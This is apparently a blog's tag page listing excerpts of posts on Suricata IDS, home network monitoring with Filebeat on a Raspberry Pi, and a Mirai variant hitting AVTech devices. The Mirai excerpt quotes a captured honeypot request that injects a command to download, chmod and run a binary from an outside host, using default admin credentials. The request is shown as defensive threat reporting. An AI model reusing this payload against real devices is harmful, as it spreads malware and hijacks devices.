Posts Tagged ‘Suricata’

Monitoring Suricata detection

The Suricata IDS is an extremely nice piece of software with multiple deployment scenarios, including inline and with mirroring or taps. The process itself usually runs without any problems, but as with any setup with multiple moving parts there are things that can go wrong. Monitoring and making sure the Suricata processes itself is easy […]

Filebeat on a Raspberry Pi

I’ve recently revamped my home network security monitoring. Currently I’m capturing and streaming all network traffic on my MikroTik router’s outside interface to a remote sensor, namely a Raspberry Pi 4 with 4 GB RAM running Suricata IDS. Suricata’s log is read by Elastic’s Filebeat and shipped to an Elasticsearch instance, making the data available […]

Compiling Suricata IDS on a Raspberry Pi 4

I’ve recently revamped my home network security monitoring. Currently I’m capturing and streaming all network traffic on my MikroTik router’s outside interface to a remote sensor, namely a Raspberry Pi 4 with 4 GB RAM running Suricata IDS. Suricata’s log is read by Elastic’s Filebeat and shipped to an Elasticsearch instance, making the data available […]

Yet another Mirai strain targeting AVTech devices

My Suricata IDS triggered on an HTTP request to my honeypot this morning: ET WEB_SERVER Suspicious Chmod Usage in URI   Further investigation revealed this incoming request: POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget%20-O%20/tmp/Arm1%20http://172.247.x.y:85/Arm1;chmod%200777%20/tmp/Arm1;/tmp/Arm1 HTTP/1.1 Host: [redacted] Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.13.0 Content-Length: 0 Authorization: Basic YWRtaW46YWRtaW4=   The request seems to take advantage of a […]